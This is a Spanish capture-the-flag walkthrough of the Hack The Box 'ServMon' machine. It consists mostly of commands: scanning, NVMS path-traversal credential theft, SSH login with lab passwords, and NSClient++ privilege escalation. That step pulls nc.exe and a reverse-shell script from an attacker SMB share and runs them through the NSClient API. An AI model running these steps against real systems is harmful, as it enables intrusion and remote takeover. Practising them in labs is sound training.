nmap -A -p- -oA servmon 10.129.96.105 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA servmon 10.129.96.105

nmap -sU -O -p- -oA servmon-udp 10.129.96.105

nikto -h 10.129.96.105:80

Pasted image 20211230134941.png

Pasted image 20211230135220.png

ftp 10.129.96.105

cd Users\Nadine

get Confidential.txt

Pasted image 20211230140012.png

cat Confidential.txt

Pasted image 20211230140113.png

cat Notes to do.txt

Pasted image 20211230141141.png

crackmapexec smb 10.129.96.105

Pasted image 20211230140220.png

smbclient -L 10.129.96.105 -N

Pasted image 20211230140855.png

http://10.129.96.105

Pasted image 20211230143542.png

searchsploit NVMS

Pasted image 20211230143941.png

cat 47774.txt

Pasted image 20211230144039.png

Abrimos burp suite y hacemos a la siguiente url:

Pasted image 20211230144727.png

Nos encontramos unas contrasenas Y los metemos en un archivo credentials.txt

Pasted image 20211230144742.png

crackmapexec smb 10.129.96.105 -u users -p credentials.txt

Pasted image 20211230165800.png

ssh nadine@servmon.htb

nadine:L1k3B1gBut7s@W0rk

Pasted image 20211230145604.png

whoami /priv

Pasted image 20211230152239.png

whoami /all

Pasted image 20211230152308.png

net user Nadine

Pasted image 20211230152350.png

http://10.129.179.121:8443

Pasted image 20211230152755.png

searchsploit nsclient

Pasted image 20211230152826.png

searchsploit -m 46802

cat 46802.txt

Pasted image 20211230153031.png

Leemos las intrucciones del exploit

Pasted image 20211230153055.png

cd C:\Program Files\NSClient

nscp web --password --display

Pasted image 20211230153346.png

No nos funciona la contrasena

Pasted image 20211230155243.png

Hacemos un port forwarding

Pasted image 20211230155309.png

Usamos la contrasena ew2x6SsGTxjRwXOT

Pasted image 20211230155550.png

Aseguramos que este habilitado

Pasted image 20211230155845.png

Creamos un bat file y le ponemos el codigo para un reverse shell

Pasted image 20211230160531.png

copy \\10.10.14.135\smbFolder\nc.exe nc.exe

sudo python3 /opt/impacket/smbserver.py smbFolder $(pwd) -smb2support

Pasted image 20211230160818.png

net use x: \\10.10.14.135\smbFolder /user:cu3rv0x password123

copy x:\reverse.bat reverse.bat

Pasted image 20211230162323.png

copy x:\nc.exe nc.exe

Pasted image 20211230162616.png

Le damos click a Add pero no me funciona.

Pasted image 20211230162907.png

curl -k -u "admin:ew2x6SsGTxjRwXOT" -XPUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/reverse.bat --data-binary @reverse.bat

Pasted image 20211230164139.png

curl -k -u "admin:ew2x6SsGTxjRwXOT" https://127.0.0.1:8443/api/v1/queries/reverse/commands/execute

nc -lvnp 443

Pasted image 20211230164157.png

boxes

copyright©2022 Cu3rv0x all rights reserved